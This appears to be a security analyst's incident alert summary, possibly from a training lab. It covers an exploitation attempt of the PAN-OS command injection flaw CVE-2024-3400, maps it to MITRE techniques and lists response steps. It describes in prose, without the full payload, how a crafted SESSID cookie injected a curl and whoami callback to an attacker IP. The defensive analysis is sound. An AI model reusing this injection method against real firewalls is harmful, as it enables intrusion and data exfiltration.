ALERT SUMMARY

MITRE ATTCK
T1190 Exploit Public Facing Application
T1059 Command and Scripting Interpreter
T1059.004 Unix Shell
T1505.003 Web Shell

WHO
External attacker from IP 144.172.79.92 targeted PA-Firewall-01 at 172.16.17.139
Source IP flagged as malicious on VirusTotal

WHAT
Command injection exploit targeting Palo Alto PAN OS vulnerability CVE 2024 3400
Malicious cookie used to inject shell command
Payload attempted to execute curl command to attacker controlled server

WHEN
Apr 18 2024 03 09 AM

WHERE
PA-Firewall-01 Global Protect login endpoint
/global-protect/login.esp
Device telemetry directory under /opt/panlogs/tmp/device_telemetry

WHY
Attacker attempted remote command execution via command injection vulnerability
Goal was to force firewall to curl back to attacker IP and exfiltrate system information

HOW
Malicious SESSID cookie contained directory traversal and shell injection
Cookie value included curl command with whoami execution
Logs confirm dt_send process attempted to send file using injected filename
Outbound connection observed to attacker IP 144.172.79.92
Curl execution failed due to DNS lookup error but command execution attempt confirmed

IMPACT
Confirmed exploitation attempt of PAN OS command injection vulnerability
Firewall executed injected command
Outbound connection to malicious IP observed
High likelihood firewall compromise

ACTION TAKEN
Escalated as confirmed compromise
Recommend immediate isolation of firewall management interface
Block attacker IP at perimeter
Rotate credentials and API keys
Check for persistence mechanisms and unauthorized admin accounts
Upgrade PAN OS to patched version
Conduct full forensic review

CVE-2024-3400 is an unauthenticated command injection flaw in PAN-OS where a crafted request allows attackers to inject shell commands that get executed as root through the device telemetry component.”